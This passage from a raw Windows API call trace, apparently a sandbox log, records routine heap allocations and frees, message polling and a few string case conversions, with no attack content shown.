RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0186.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0186.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0186.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0186.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0186.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0186.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0186.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0186.160] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0186.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0186.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0186.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0186.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0186.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0186.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0186.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0186.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0186.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0186.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0186.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0186.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0186.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0186.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0186.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0186.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0186.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0186.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0186.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0186.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0186.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0186.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0186.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0186.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0186.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0186.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0186.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0186.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0186.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0186.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0186.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0186.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0186.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0186.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0186.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0186.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0186.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0186.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0186.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0186.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0186.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0186.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0186.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0186.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0186.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0186.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0186.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0186.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0186.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0186.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0186.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0186.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0186.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0186.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0186.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0186.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0186.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0186.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0186.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0186.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0186.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0186.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0186.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0186.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0186.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0186.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0186.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0186.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0186.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0186.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0186.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0186.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0186.163] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0186.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0186.163] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0186.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0186.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0186.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0186.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a00 [0186.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0186.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0186.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0186.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0186.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0186.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0186.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0186.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0186.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0186.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0186.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0186.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0186.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0186.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0186.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0186.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0186.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0186.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0186.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0186.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0186.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0186.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b20 [0186.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0186.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0186.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0186.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e19f0 [0186.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0186.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba018 [0186.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0186.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0186.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0186.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0186.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0186.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0186.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0186.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0186.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0186.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0186.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0186.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0186.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0186.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0186.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0186.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0186.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0186.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0186.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0186.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0186.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0186.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0186.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0186.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0186.166] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0186.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0186.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0186.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0186.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0186.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0186.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0186.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0186.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0186.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0186.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0186.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0186.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0186.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0186.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0186.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0186.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0186.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0186.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0186.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0186.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0186.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0186.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0186.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0186.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0186.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0186.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0186.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0186.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0186.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0186.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0186.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0186.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0186.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0186.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0186.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0186.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0186.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0186.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0186.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0186.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0186.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0186.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0186.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0186.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0186.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0186.169] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0186.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0186.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0186.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0186.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0186.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0186.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0186.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0186.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0186.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0186.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0186.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0186.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0186.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0186.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0186.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0186.170] RtlAllocateHeap (HeapHandle=0x8a0000, 